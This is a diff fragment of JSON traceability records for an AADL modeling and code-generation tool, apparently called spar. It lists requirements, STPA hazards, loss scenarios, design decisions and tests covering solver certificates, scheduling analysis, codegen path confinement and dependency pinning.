+      "description": "Every solver run must produce a certificate containing: (a) the objective function definition (what was optimized), (b) the primal objective value (the solution's cost), (c) the dual bound (lower bound from relaxation), (d) the optimality gap as a percentage, (e) solver parameters (time limit, tolerance, algorithm). The certificate must contain sufficient data for an independent verifier to reproduce the gap calculation without running the solver.\n",
+      "id": "SOLVER-REQ-022",
+      "links": [],
+      "status": "not-implemented",
+      "tags": [
+        "safety",
+        "solver",
+        "certificate",
+        "verification",
+        "stpa"
+      ],
+      "title": "Optimality certificate with independent verification data",
+      "type": "requirement"
+    },
+    {
+      "description": "Tests verifying that ports are rendered with correct side placement, directional indicators, and type-based coloring on component boundaries.\n",
+      "id": "VAL-R3",
+      "links": [
+        {
+          "target": "RENDER-REQ-002",
+          "type": "satisfies"
+        },
+        {
+          "target": "ARCH-R1",
+          "type": "satisfies"
+        }
+      ],
+      "status": "implemented",
+      "tags": [],
+      "title": "Port positioning tests (RENDER-REQ-002)",
+      "type": "feature"
+    },
+    {
+      "description": "Spar must maintain a COMPLIANCE.md documenting which AADL standard sections are covered by analyses, which legality rules are implemented, and known gaps. This must be updated when new analyses are added.\n",
+      "id": "STPA-REQ-022",
+      "links": [],
+      "status": "implemented",
+      "tags": [
+        "safety",
+        "documentation",
+        "stpa"
+      ],
+      "title": "Analysis coverage documentation",
+      "type": "requirement"
+    },
+    {
+      "description": "Compute mode reachability matrix, detect unreachable modes, detect dead transitions (trigger ports not connected), and export NuSMV (.smv) models for external model checking.\n",
+      "id": "REQ-ANALYSIS-009",
+      "links": [],
+      "status": "implemented",
+      "tags": [
+        "analysis",
+        "modes",
+        "as5506-ch12"
+      ],
+      "title": "Mode reachability analysis and NuSMV export",
+      "type": "requirement"
+    },
+    {
+      "description": "",
+      "id": "CC-S8",
+      "links": [],
+      "status": "-",
+      "tags": [],
+      "title": "E2E latency must include all path segments",
+      "type": "controller-constraint"
+    },
+    {
+      "description": "Verifies that systems with comfortable timing margins do not produce sensitivity warnings.\n",
+      "id": "VAL-042",
+      "links": [
+        {
+          "target": "STPA-REQ-025",
+          "type": "satisfies"
+        }
+      ],
+      "status": "passing",
+      "tags": [],
+      "title": "No sensitivity warning with ample margin",
+      "type": "feature"
+    },
+    {
+      "description": "Import AUTOSAR Adaptive/Classic ARXML into AADL. Execution Manifests → process/thread bindings, Service Instance Manifests → connections, Machine Manifests → processor configurations. Enables spar analysis on existing AUTOSAR models without manual AADL modeling.\n",
+      "id": "REQ-INTEROP-004",
+      "links": [],
+      "status": "planned",
+      "tags": [
+        "interop",
+        "autosar",
+        "bridge",
+        "v050"
+      ],
+      "title": "AUTOSAR ARXML import",
+      "type": "requirement"
+    },
+    {
+      "description": "The codegen pipeline must canonicalize all generated file paths and verify that each resolved path is a descendant of the output directory. If any generated path would escape the output directory (via .., symlinks, or absolute paths), codegen must emit an error and skip that file. This check must occur after all path component construction, including process name and thread name interpolation.\n",
+      "id": "STPA-SEC-REQ-003",
+      "links": [],
+      "status": "not-implemented",
+      "tags": [
+        "security",
+        "codegen",
+        "filesystem",
+        "stpa-sec"
+      ],
+      "title": "Output path confinement for generated files",
+      "type": "requirement"
+    },
+    {
+      "description": "Each AADL process generates a Cargo crate with: lib.rs (trait impl skeleton), ports.rs (typed channels), types.rs (data structs), config.rs (#[aadl(...)] scheduling attributes). System generates Cargo workspace. Both native and WASM component targets.\n",
+      "id": "REQ-CODEGEN-RUST",
+      "links": [
+        {
+          "target": "REQ-CODEGEN-001",
+          "type": "traces-to"
+        }
+      ],
+      "status": "planned",
+      "tags": [
+        "codegen",
+        "rust",
+        "v040"
+      ],
+      "title": "Generate Rust crate skeletons from AADL",
+      "type": "requirement"
+    },
+    {
+      "description": "",
+      "id": "UCA-5",
+      "links": [],
+      "status": "-",
+      "tags": [],
+      "title": "Name resolution returns wrong classifier",
+      "type": "uca"
+    },
+    {
+      "description": "Created regression_tests.rs in spar-analysis with 6 seed tests covering past bugs (intentionally_unconnected suppression, invalid containment detection, in_modes preservation, duplicate initial modes, register_all completeness). Each test documents the original bug.\n",
+      "id": "ARCH-025",
+      "links": [
+        {
+          "target": "STPA-REQ-023",
+          "type": "satisfies"
+        }
+      ],
+      "status": "-",
+      "tags": [],
+      "title": "Regression test module for closed issues",
+      "type": "design-decision"
+    },
+    {
+      "description": "",
+      "id": "CC-4",
+      "links": [],
+      "status": "-",
+      "tags": [],
+      "title": "Resolver must handle ambiguous names deterministically",
+      "type": "controller-constraint"
+    },
+    {
+      "description": "",
+      "id": "UCA-SEC-1",
+      "links": [],
+      "status": "-",
+      "tags": [],
+      "title": "Lowering silently drops security-relevant constructs",
+      "type": "uca"
+    },
+    {
+      "description": "Analysis coverage of AS5506 sections is tracked as rivet artifacts with traces-to links in artifacts/requirements.yaml, not as a standalone COMPLIANCE.md document. rivet validate and rivet coverage commands verify completeness.\n",
+      "id": "ARCH-024",
+      "links": [
+        {
+          "target": "STPA-REQ-022",
+          "type": "satisfies"
+        }
+      ],
+      "status": "-",
+      "tags": [],
+      "title": "Coverage tracking via rivet artifacts",
+      "type": "design-decision"
+    },
+    {
+      "description": "\nThere is no way to select a component or connection and see its\n\nrelationships highlighted. Engineers cannot isolate a subsystem\n\nfor focused review.\n",
+      "id": "H-R5",
+      "links": [],
+      "status": "-",
+      "tags": [],
+      "title": "No selection or highlighting",
+      "type": "hazard"
+    },
+    {
+      "description": "XSS prevention in SVG rendering, YAML/TOML injection prevention, path traversal protection, UTF-8 safe percent decoding, arena bounds checks.\n",
+      "id": "FEAT-SECURITY-001",
+      "links": [
+        {
+          "target": "STPA-SEC-REQ-001",
+          "type": "satisfies"
+        }
+      ],
+      "status": "passing",
+      "tags": [
+        "v0.5.0",
+        "security"
+      ],
+      "title": "Security hardening from adversarial scanning",
+      "type": "feature"
+    },
+    {
+      "description": "Bazel verification rules (verus_verify, lean_verify) must perform an explicit tool availability check before running verification. If the tool binary is not found on PATH or at the configured path, the rule must fail with a clear error message, not produce a cached success artifact. The check must use `which` or equivalent and verify the tool version meets minimum requirements.\n",
+      "id": "STPA-REQ-037",
+      "links": [],
+      "status": "not-implemented",
+      "tags": [
+        "safety",
+        "codegen",
+        "verification",
+        "bazel",
+        "stpa"
+      ],
+      "title": "Verification tool availability check",
+      "type": "requirement"
+    },
+    {
+      "description": "Verifies that an enumeration value not in the declared variant list produces a diagnostic.\n",
+      "id": "VAL-006",
+      "links": [
+        {
+          "target": "STPA-REQ-006",
+          "type": "satisfies"
+        },
+        {
+          "target": "ARCH-005",
+          "type": "satisfies"
+        }
+      ],
+      "status": "passing",
+      "tags": [],
+      "title": "Invalid enumeration literal detected",
+      "type": "feature"
+    },
+    {
+      "description": "Mutation testing campaign covering 674 analysis tests. Validates that the test suite detects injected faults in analysis logic. Survivor count reduced to 142, confirming high fault-detection capability of the analysis test suite.\n",
+      "id": "VAL-MUTATION-001",
+      "links": [
+        {
+          "target": "ARCH-ANALYSIS",
+          "type": "satisfies"
+        }
+      ],
+      "status": "pass",
+      "tags": [],
+      "title": "Mutation testing for analysis passes",
+      "type": "feature"
+    },
+    {
+      "description": "Solve deployment in hierarchical layers analogous to NDS navigation: Layer 0 (Component) — schedule threads within one processor (RTA). Layer 1 (Cluster) — allocate processes to processors within a subsystem (bin packing + schedulability). Layer 2 (System) — allocate subsystems to hardware zones (topology + bandwidth + safety). Layer 3 (Global) — optimize across all zones (E2E latency, safety decomposition, cost). Local solutions compose into globally valid configurations.\n",
+      "id": "REQ-SOLVER-004",
+      "links": [],
+      "status": "planned",
+      "tags": [
+        "solver",
+        "optimization",
+        "v040"
+      ],
+      "title": "Hierarchical deployment solving (NDS-layered)",
+      "type": "requirement"
+    },
+    {
+      "description": "",
+      "id": "CTRL-ENGINEER-S",
+      "links": [],
+      "status": "-",
+      "tags": [],
+      "title": "Deployment Engineer",
+      "type": "controller"
+    },
+    {
+      "description": "workspace_gen.rs currently generates rust_library, wasm_component, and rust_test targets per crate. The planned fix adds verus_verify and lean_verify targets when the generated crate contains files matching proof patterns (verus! blocks, #[kani::proof], .lean files). A flag `--verification-targets` on `spar codegen` controls this.\n",
+      "id": "ARCH-031",
+      "links": [
+        {
+          "target": "STPA-REQ-038",
+          "type": "satisfies"
+        }
+      ],
+      "status": "-",
+      "tags": [],
+      "title": "Per-crate verification targets in codegen (planned)",
+      "type": "design-decision"
+    },
+    {
+      "description": "Added 8 tests verifying SVG output contains correct node count, edge count, node labels matching instance names, edge source/target attributes, hierarchy preservation, and parametric size checks.\n",
+      "id": "ARCH-023",
+      "links": [
+        {
+          "target": "STPA-REQ-021",
+          "type": "satisfies"
+        }
+      ],
+      "status": "-",
+      "tags": [],
+      "title": "SVG topology verification tests",
+      "type": "design-decision"
+    },
+    {
+      "description": "Verifies that has_modes() returns false when the instance has no system operation modes.\n",
+      "id": "VAL-025",
+      "links": [
+        {
+          "target": "STPA-REQ-017",
+          "type": "satisfies"
+        },
+        {
+          "target": "ARCH-012",
+          "type": "satisfies"
+        }
+      ],
+      "status": "passing",
+      "tags": [],
+      "title": "has_modes returns false for non-modal instance",
+      "type": "feature"
+    },
+    {
+      "description": "An independent verifier (separate code path from the solver) must check optimality certificates. The verifier must: (a) recompute the gap from primal and dual values, (b) verify that the primal solution satisfies all constraints by re-evaluating constraints against the reported binding, (c) flag any inconsistency. The verifier must be included in the CI test suite.\n",
+      "id": "SOLVER-REQ-023",
+      "links": [],
+      "status": "not-implemented",
+      "tags": [
+        "safety",
+        "solver",
+        "certificate",
+        "independent-check",
+        "stpa"
+      ],
+      "title": "Independent certificate verifier",
+      "type": "requirement"
+    },
+    {
+      "description": "\nRust source,\nWIT interfaces,\nTOML configs,\nBUILD.bazel,\n\nLean4 proofs,\nand Kani harnesses produced by codegen.\n",
+      "id": "CP-SEC-GENERATED-CODE",
+      "links": [],
+      "status": "-",
+      "tags": [],
+      "title": "Generated Source Code and Build Files",
+      "type": "controlled-process"
+    },
+    {
+      "description": "Generated tests verify: port types match AADL classifiers, port directions match, all required ports connected, execution time within WCET bounds. Test results feed into rivet as verification evidence artifacts.\n",
+      "id": "REQ-CODEGEN-VERIFY-TEST",
+      "links": [
+        {
+          "target": "REQ-CODEGEN-001",
+          "type": "traces-to"
+        }
+      ],
+      "status": "planned",
+      "tags": [
+        "codegen",
+        "verification",
+        "testing",
+        "v040"
+      ],
+      "title": "Test-time contract + timing verification",
+      "type": "requirement"
+    },
+    {
+      "description": "\nThe solver stores candidate allocations in a HashMap<ProcessorId,\n\nVec<ProcessId>>. The iteration order of HashMap is non-deterministic.\n\nWhen two allocations have equal cost,\nthe solver picks the first one\n\nfound during iteration. Run 1 produces allocation A (processes on\n\nCPU1),\nrun 2 produces allocation B (processes on CPU2). Both are\n\nfeasible. But the engineer reviews allocation A,\napproves it,\nthen\n\nruns the solver again for the final build and gets allocation B.\n\nThe approved deployment does not match the deployed one.\n",
+      "id": "LS-S11",
+      "links": [],
+      "status": "-",
+      "tags": [],
+      "title": "Solver non-determinism from HashMap iteration",
+      "type": "loss-scenario"
+    },
+    {
+      "description": "",
+      "id": "UCA-14",
+      "links": [],
+      "status": "-",
+      "tags": [],
+      "title": "JSON serialization drops field",
+      "type": "uca"
+    },
+    {
+      "description": "Tests verifying compute_semantic_connections emits diagnostics when connection endpoints cannot be resolved.\n",
+      "id": "TEST-STPA-UNRESOLVED",
+      "links": [
+        {
+          "target": "STPA-REQ-013",
+          "type": "satisfies"
+        }
+      ],
+      "status": "-",
+      "tags": [],
+      "title": "Unresolved connection endpoint tests (STPA-REQ-013)",
+      "type": "feature"
+    },
+    {
+      "description": "Lower CST to an ItemTree capturing packages, component types, component implementations, feature group types, property sets, and all nested items (features, subcomponents, connections, flows, modes, prototypes, call sequences, renames).\n",
+      "id": "REQ-MODEL-001",
+      "links": [],
+      "status": "implemented",
+      "tags": [
+        "model",
+        "as5506-ch4"
+      ],
+      "title": "Declarative model construction (ItemTree)",
+      "type": "requirement"
+    },
+    {
+      "description": "\nEach solver layer produces a locally optimal solution,\nbut the\n\ncomposition of layers violates a global constraint. For example,\n\nLayer 0 and Layer 1 individually satisfy timing,\nbut the combined\n\nallocation creates bus contention at Layer 2 that violates the\n\nend-to-end latency budget at Layer 3.\n",
+      "id": "H-S9",
+      "links": [],
+      "status": "-",
+      "tags": [],
+      "title": "Hierarchical composition violates global constraint",
+      "type": "hazard"
+    },
+    {
+      "description": "Generated Cargo.toml files must use exact version pins (e.g., wit-bindgen = \"=0.36.0\") instead of semver ranges. Generated BUILD.bazel files must reference content-addressed artifacts where possible. A Cargo.lock must be generated alongside the workspace Cargo.toml. Process names must be checked against a reserved list of common crate names (serde, tokio, rand, etc.) and must be prefixed with \"aadl_\" if they collide.\n",
+      "id": "STPA-SEC-REQ-005",
+      "links": [],
+      "status": "not-implemented",
+      "tags": [
+        "security",
+        "codegen",
+        "supply-chain",
+        "stpa-sec"
+      ],
+      "title": "Exact version pins in generated dependency specifications",
+      "type": "requirement"
+    },
+    {
+      "description": "RTA, bus bandwidth, memory budget, and weight/power analysis passes are each independent modules implementing the existing Analysis trait. They register with AnalysisRunner and produce AnalysisDiagnostic results, consistent with the existing passes.\n",
+      "id": "ARCH-ANALYSIS-001",
+      "links": [
+        {
+          "target": "REQ-RTA-001",
+          "type": "satisfies"
+        },
+        {
+          "target": "REQ-BUS-001",
+          "type": "satisfies"
+        },
+        {
+          "target": "REQ-MEMBUD-001",
+          "type": "satisfies"
+        },
+        {
+          "target": "REQ-WEIGHTPOWER-001",
+          "type": "satisfies"
+        }
+      ],
+      "status": "implemented",
+      "tags": [
+        "architecture",
+        "analysis",
+        "v030"
+      ],
+      "title": "New analysis passes follow existing Analysis trait",
+      "type": "design-decision"
+    },
+    {
+      "description": "\nEvery binding configuration reported as feasible must satisfy all\n\ndeclared constraints. A post-solve validation pass must independently\n\nverify the solution against the original constraints.\n",
+      "id": "SC-S1",
+      "links": [],
+      "status": "-",
+      "tags": [],
+      "title": "Solver must not produce infeasible bindings marked feasible",
+      "type": "system-constraint"
+    },
+    {
+      "description": "Verifies that setting Transmission_Time on the flow owner suppresses the inter-processor overhead advisory.\n",
+      "id": "VAL-050",
+      "links": [
+        {
+          "target": "STPA-REQ-028",
+          "type": "satisfies"
+        }
+      ],
+      "status": "passing",
+      "tags": [],
+      "title": "Cross-processor flow with overhead no advisory",
+      "type": "feature"
+    },
+    {
+      "description": "",
+      "id": "UCA-20",
+      "links": [],
+      "status": "-",
+      "tags": [],
+      "title": "Subcomponent category hardcoded to System",
+      "type": "uca"
+    },
+    {
+      "description": "The virtual bus library must be validated against known protocol specifications before use. Each library entry must include a reference to the protocol standard (e.g., ARINC 664 Part 7 for AFDX, MIL-STD-1553 for 1553). A library validation tool must check that declared properties (bandwidth, latency, frame size) are within the ranges specified by the referenced standard. Library entries without standard references must produce a warning.\n",
+      "id": "SOLVER-REQ-032",
+      "links": [],
+      "status": "not-implemented",
+      "tags": [
+        "safety",
+        "solver",
+        "protocol-library",
+        "validation",
+        "stpa"
+      ],
+      "title": "Protocol library validation",
+      "type": "requirement"
+    },
+    {
+      "description": "Verifies end-to-end SysML v2 to AADL lowering against a golden model. The test parses a non-trivial SysML v2 model with part defs, port defs, connections, attributes, states, constraints, and specialization, then compares the produced AADL ItemTree against expected output.\n",
+      "id": "VAL-058",
+      "links": [
+        {
+          "target": "STPA-REQ-036",
+          "type": "satisfies"
+        },
+        {
+          "target": "ARCH-029",
+          "type": "satisfies"
+        }
+      ],
+      "status": "passing",
+      "tags": [],
+      "title": "SysML v2 lowering golden model test",
+      "type": "feature"
+    },
+    {
+      "description": "\nThe solver's rowan CST editing inserts a property association in\n\nthe wrong component scope,\ndeletes an existing property,\nproduces\n\ninvalid syntax,\nor corrupts whitespace/comments in the source file.\n",
+      "id": "H-S5",
+      "links": [],
+      "status": "-",
+      "tags": [],
+      "title": "Source rewrite corrupts AADL model",
+      "type": "hazard"
+    },
+    {
+      "description": "",
+      "id": "CTRL-MODEL",
+      "links": [],
+      "status": "-",
+      "tags": [],
+      "title": "Model Builder (spar-hir-def)",
+      "type": "controller"
+    },
+    {
+      "description": "",
+      "id": "CC-SEC-3",
+      "links": [],
+      "status": "-",
+      "tags": [],
+      "title": "Output path confinement",
+      "type": "controller-constraint"
+    },
+    {
+      "description": "",
+      "id": "UCA-S2",
+      "links": [],
+      "status": "-",
+      "tags": [],
+      "title": "RTA not performed for a processor",
+      "type": "uca"
+    },
+    {
+      "description": "Added register_all() method to AnalysisRunner that registers all 21 Analysis trait implementations. The CLI now calls register_all() instead of individual register() calls. Added count() method for test verification.\n",
+      "id": "ARCH-015",
+      "links": [
+        {
+          "target": "STPA-REQ-014",
+          "type": "satisfies"
+        }
+      ],
+      "status": "-",
+      "tags": [],
+      "title": "AnalysisRunner::register_all() for automatic analysis registration",
+      "type": "design-decision"
+    },
+    {
+      "description": "Tests for Response Time Analysis covering deadline miss detection, convergence of iterative WCRT computation, multi-processor thread grouping, and correct handling of missing Deadline/Period properties.\n",
+      "id": "VAL-RTA-001",
+      "links": [
+        {
+          "target": "REQ-RTA-001",
+          "type": "verifies"
+        },
+        {
+          "target": "ARCH-ANALYSIS-001",
+          "type": "satisfies"
+        }
+      ],
+      "status": "planned",
+      "tags": [],
+      "title": "RTA response time analysis tests",
+      "type": "feature"
+    },
+    {
+      "description": "Parse .sysml files, find requirement def elements, generate rivet requirement artifacts with satisfy/verify links preserved. Bridges SysML v2 requirement management with rivet traceability. Links map: SysML satisfy → rivet satisfies, SysML verify → rivet verifies.\n",
+      "id": "REQ-SYSML2-EXTRACT",
+      "links": [
+        {
+          "target": "REQ-INTEROP-001",
+          "type": "traces-to"
+        }
+      ],
+      "status": "implemented",
+      "tags": [
+        "sysml2",
+        "requirements",
+        "rivet",
+        "v040"
+      ],
+      "title": "Extract SysML v2 requirements to rivet YAML",
+      "type": "requirement"
+    },
+    {
+      "description": "The solver must perform sensitivity analysis on protocol property values. After producing a binding, the solver must perturb protocol latencies by +25% and re-check E2E flow deadlines. If any flow deadline is violated under perturbation, the solver must emit a warning identifying the sensitive flows and the margin. This accounts for virtual bus library inaccuracies and real-world protocol variability.\n",
+      "id": "SOLVER-REQ-033",
+      "links": [],
+      "status": "not-implemented",
+      "tags": [
+        "safety",
+        "solver",
+        "sensitivity",
+        "protocol-library",
+        "stpa"
+      ],
+      "title": "Sensitivity analysis for protocol properties",
+      "type": "requirement"
+    },
+    {
+      "description": "Verifies that processor utilization above 80% triggers a clock drift advisory.\n",
+      "id": "VAL-051",
+      "links": [
+        {
+          "target": "STPA-REQ-029",
+          "type": "satisfies"
+        }
+      ],
+      "status": "passing",
+      "tags": [],
+      "title": "Clock drift advisory at high utilization",
+      "type": "feature"
+    },
+    {
+      "description": "",
+      "id": "UCA-S7",
+      "links": [],
+      "status": "-",
+      "tags": [],
+      "title": "Protocol selected with insufficient bandwidth",
+      "type": "uca"
+    },
+    {
+      "description": "After the solver's allocation phase completes, RTA must be performed for every processor that has at least one thread bound to it. The solver must maintain a set of \"dirty\" processors (whose thread sets have changed) and re-run RTA for each dirty processor before reporting feasibility. An integration test must verify that no populated processor is skipped.\n",
+      "id": "SOLVER-REQ-004",
+      "links": [],
+      "status": "not-implemented",
+      "tags": [
+        "safety",
+        "solver",
+        "scheduling",
+        "completeness",
+        "stpa"
+      ],
+      "title": "Schedulability check for every populated processor",
+      "type": "requirement"
+    },
+    {
+      "description": "A visibility-graph router with obstacle avoidance replaces bezier curves. Edges follow rectilinear (horizontal/vertical) paths, routing around component boxes to minimize crossings.\n",
+      "id": "ARCH-R2",
+      "links": [
+        {
+          "target": "RENDER-REQ-001",
+          "type": "satisfies"
+        }
+      ],
+      "status": "implemented",
+      "tags": [],
+      "title": "Orthogonal edge routing",
+      "type": "design-decision"
+    },
+    {
+      "description": "All 21 analysis modules contain severity rationale comment blocks in their analyze() methods documenting Error/Warning/Info criteria.\n",
+      "id": "VERIFY-STPA-SEVERITY-DOCS",
+      "links": [
+        {
+          "target": "STPA-REQ-016",
+          "type": "satisfies"
+        }
+      ],
+      "status": "-",
+      "tags": [],
+      "title": "Severity rationale documentation (STPA-REQ-016)",
+      "type": "feature"
+    },
+    {
+      "description": "Each analysis rule must document its severity assignment rationale in code comments. Error = confirmed standard violation or guaranteed runtime failure. Warning = likely defect. Info = suggestion.\n",
+      "id": "STPA-REQ-016",
+      "links": [],
+      "status": "implemented",
+      "tags": [
+        "safety",
+        "analysis",
+        "stpa"
+      ],
+      "title": "Severity assignment criteria documentation",
+      "type": "requirement"
+    },
+    {
+      "description": "For conflicting objectives (minimize latency vs minimize cost vs maximize safety margins), compute the Pareto front of non-dominated solutions. Present to the engineer for interactive selection. Support both exact Pareto (small problems) and approximate (NSGA-II for large).\n",
+      "id": "REQ-SOLVER-006",
+      "links": [],
+      "status": "planned",
+      "tags": [
+        "solver",
+        "optimization",
+        "v040"
+      ],
+      "title": "Multi-objective Pareto front computation",
+      "type": "requirement"
+    },
+    {
+      "description": "Communication protocols modeled as AADL virtual bus types in a standard library package. Each virtual bus type has properties: latency_overhead, bandwidth_capacity, max_payload, security_profile, bus_type_compatibility. Solver selects from compatible virtual buses when binding connections to physical buses.\n",
+      "id": "ARCH-SOLVER-003",
+      "links": [
+        {
+          "target": "REQ-SOLVER-002",
+          "type": "satisfies"
+        }
+      ],
+      "status": "implemented",
+      "tags": [
+        "architecture",
+        "solver",
+        "v030"
+      ],
+      "title": "Virtual bus library as AADL package",
+      "type": "design-decision"
+    },
+    {
+      "description": "The codegen pipeline must enforce configurable limits: maximum number of generated files (default: 10,000), maximum total output size (default: 100 MB), maximum components per model (default: 100,000). When a limit is exceeded, codegen must emit an error diagnostic and halt. These limits must be configurable via CLI flags (--max-files, --max-output-size, --max-components).\n",
+      "id": "STPA-SEC-REQ-009",
+      "links": [],
+      "status": "not-implemented",
+      "tags": [
+        "security",
+        "codegen",
+        "resource-limits",
+        "stpa-sec"
+      ],
+      "title": "Resource limits on code generation output",
+      "type": "requirement"
+    },
+    {
+      "description": "",
+      "id": "UCA-SEC-12",
+      "links": [],
+      "status": "-",
+      "tags": [],
+      "title": "wasm-tools component new accepts unverified core module",
+      "type": "uca"
+    },
+    {
+      "description": "",
+      "id": "CTRL-REVIEWER",
+      "links": [],
+      "status": "-",
+      "tags": [],
+      "title": "Safety Reviewer",
+      "type": "controller"
+    },
+    {
+      "description": "\nA connection between two threads is traced through feature groups\n\nand intermediate processes. Layer 1 binds the two threads' enclosing\n\nprocesses to different processors. Layer 2 enumerates cross-processor\n\nconnections by checking direct subcomponent bindings but does not\n\ntrace through the process hierarchy. The connection is not identified\n\nas cross-processor and receives no bus binding. At runtime,\nthe\n\nconnection has no communication path.\n",
+      "id": "LS-S8",
+      "links": [],
+      "status": "-",
+      "tags": [],
+      "title": "Layer 2 misses cross-processor connection",
+      "type": "loss-scenario"
+    },
+    {
+      "description": "",
+      "id": "CTRL-LAYER1",
+      "links": [],
+      "status": "-",
+      "tags": [],
+      "title": "Layer 1 — Process Allocator (bin packing)",
+      "type": "controller"
+    },
+    {
+      "description": "The infer_category function must emit an info diagnostic for every part def it classifies, stating the inferred category and the evidence used (e.g., \"part def 'Monitor' classified as system: no action/state usages found\"). Engineers must be able to override the inference via a SysML v2 annotation or comment convention (e.g., `/* @aadl-category: thread */`).\n",
+      "id": "STPA-SEC-REQ-011",
+      "links": [],
+      "status": "not-implemented",
+      "tags": [
+        "security",
+        "sysml2",
+        "lowering",
+        "stpa-sec"
+      ],
+      "title": "SysML v2 category inference audit logging",
+      "type": "requirement"
+    },
+    {
+      "description": "\nThe solver rewrites AADL source properties but the salsa\n\nincremental cache is not properly invalidated. Subsequent analysis\n\npasses read stale pre-rewrite values from the cache,\nproducing\n\nresults that do not reflect the actual (rewritten) model.\n",
+      "id": "H-S8",
+      "links": [],
+      "status": "-",
+      "tags": [],
+      "title": "Stale analysis after source rewrite",
+      "type": "hazard"
+    },
+    {
+      "description": "Extract requirements with satisfy/verify/refine/allocate/derive relationships, architecture context, and roundtrip generation.\n",
+      "id": "FEAT-SYSML2-EXTRACT",
+      "links": [
+        {
+          "target": "REQ-SYSML2-EXTRACT",
+          "type": "satisfies"
+        },
+        {
+          "target": "REQ-INTEROP-001",
+          "type": "satisfies"
+        }
+      ],
+      "status": "passing",
+      "tags": [
+        "v0.5.0",
+        "sysml2"
+      ],
+      "title": "SysML v2 complete extraction pipeline",
+      "type": "feature"
+    },
+    {
+      "description": "",
+      "id": "CA-SEC-GENBUILD",
+      "links": [],
+      "status": "-",
+      "tags": [],
+      "title": "Generate build configuration",
+      "type": "control-action"
+    },
+    {
+      "description": "Generate deployable code from AADL component implementations. Dual output: WIT interfaces (component contracts) + Rust crate skeletons (implementation). Process → crate, thread → async fn, data type → struct, port → typed channel / WIT stream.\n",
+      "id": "REQ-CODEGEN-001",
+      "links": [
+        {
+          "target": "REQ-TRANSFORM-001",
+          "type": "traces-to"
+        }
+      ],
+      "status": "planned",
+      "tags": [
+        "codegen",
+        "competitive-gap",
+        "v040"
+      ],
+      "title": "Code skeleton generation (Rust + WIT)",
+      "type": "requirement"
+    },
+    {
+      "description": "Generate timeline diagrams showing thread execution over time on each processor. Visualize preemption, blocking, response times, deadline margins. Cheddar and Ellidiss MARZHIN offer this — spar has static RMA/RTA but no temporal visualization. Output as SVG/HTML with interactive zoom.\n",
+      "id": "REQ-TIMELINE-001",
+      "links": [],
+      "status": "planned",
+      "tags": [
+        "visualization",
+        "scheduling",
+        "competitive-gap",
+        "v040"
+      ],
+      "title": "Scheduling timeline visualization",
+      "type": "requirement"
+    },
+    {
+      "description": "",
+      "id": "UCA-21",
+      "links": [],
+      "status": "-",
+      "tags": [],
+      "title": "Verification rule silently passes when tool missing",
+      "type": "uca"
+    },
+    {
+      "description": "Will verify that workspace_gen.rs produces verus_verify and/or lean_verify targets in per-crate BUILD.bazel files. Blocked on STPA-REQ-038 implementation.\n",
+      "id": "VAL-064",
+      "links": [
+        {
+          "target": "STPA-REQ-038",
+          "type": "satisfies"
+        },
+        {
+          "target": "ARCH-031",
+          "type": "satisfies"
+        }
+      ],
+      "status": "planned",
+      "tags": [],
+      "title": "Generated BUILD includes verification targets (planned)",
+      "type": "feature"
+    },
+    {
+      "description": "\nThe solver claims its solution is optimal (or within a bounded gap)\n\nwhen it is not. Engineers accept a suboptimal deployment without\n\nexploring better alternatives. In the worst case,\na feasible\n\nsolution exists but the solver claims infeasibility,\nblocking\n\nthe project.\n",
+      "id": "L-S5",
+      "links": [],
+      "status": "-",
+      "tags": [],
+      "title": "False confidence from invalid optimality certificate",
+      "type": "loss"
+    },
+    {
+      "description": "",
+      "id": "CC-S1",
+      "links": [],
+      "status": "-",
+      "tags": [],
+      "title": "RTA must use worst-case parameters",
+      "type": "controller-constraint"
+    },
+    {
+      "description": "\nA stakeholder review (design review,\ncertification audit) fails\n\nbecause the rendered diagram is unreadable or incomprehensible,\n\ndelaying certification milestones.\n",
+      "id": "L-R4",
+      "links": [],
+      "status": "-",
+      "tags": [],
+      "title": "Stakeholder review fails",
+      "type": "loss"
+    },
+    {
+      "description": "Expand array subcomponents (sub[N]: thread T) into N instances with proper indexing and connection pattern expansion.\n",
+      "id": "REQ-INST-002",
+      "links": [],
+      "status": "implemented",
+      "tags": [
+        "instance",
+        "as5506-ch14"
+      ],
+      "title": "Array subcomponent expansion",
+      "type": "requirement"
+    },
+    {
+      "description": "Salsa-memoized file_item_tree, CST-aware completion, rename safety, LineIndex O(1) positions, duplicate package detection, DidClose handler.\n",
+      "id": "FEAT-LSP-HARDENING",
+      "links": [
+        {
+          "target": "REQ-LSP-001",
+          "type": "satisfies"
+        }
+      ],
+      "status": "passing",
+      "tags": [
+        "v0.5.0",
+        "lsp"
+      ],
+      "title": "LSP salsa incremental + correctness hardening",
+      "type": "feature"
+    },
+    {
+      "description": "Certificates must be generated for all solver outcomes: optimal solutions (gap = 0), bounded-gap solutions (gap > 0 with dual bound), heuristic solutions (gap = unknown, certificate must state \"no optimality proof — heuristic solution\"), and infeasible results (certificate must include the infeasibility proof or state which constraint set is unsatisfiable). Solutions without certificates must not be reported to the user.\n",
+      "id": "SOLVER-REQ-024",
+      "links": [],
+      "status": "not-implemented",
+      "tags": [
+        "safety",
+        "solver",
+        "certificate",
+        "completeness",
+        "stpa"
+      ],
+      "title": "Certificate required for all solution types",
+      "type": "requirement"
+    },
+    {
+      "description": "After the solver produces a binding and (optionally) rewrites AADL source files, the solver must re-run the full analysis suite (all 21+ analysis passes) on the resulting model. The post-solve analysis must use the rewritten model (not the pre-solve model). Any analysis diagnostic at error severity must cause the solver to report failure, even if the solver's internal validation passed.\n",
+      "id": "SOLVER-REQ-026",
+      "links": [],
+      "status": "not-implemented",
+      "tags": [
+        "safety",
+        "solver",
+        "validation",
+        "post-solve",
+        "stpa"
+      ],
+      "title": "Mandatory post-solve re-analysis",
+      "type": "requirement"
+    },
+    {
+      "description": "\nPort connections appear identical regardless of direction,\ntype,\n\nor feature,\ncausing incorrect integration decisions or runtime\n\nfailures in the deployed system.\n",
+      "id": "L-R3",
+      "links": [],
+      "status": "-",
+      "tags": [],
+      "title": "Engineer cannot distinguish port connections",
+      "type": "loss"
+    },
+    {
+      "description": "WebviewPanel integration renders architecture diagrams live in VS Code. Automatic refresh on file save, theme-aware styling, pan/zoom controls in the webview.\n",
+      "id": "FEAT-VSCODE-LIVE",
+      "links": [
+        {
+          "target": "RENDER-REQ-003",
+          "type": "satisfies"
+        },
+        {
+          "target": "REQ-LSP-001",
+          "type": "satisfies"
+        }
+      ],
+      "status": "passing",
+      "tags": [
+        "v0.5.0",
+        "tooling",
+        "vscode"
+      ],
+      "title": "VS Code live rendering via WebviewPanel",
+      "type": "feature"
+    },
+    {
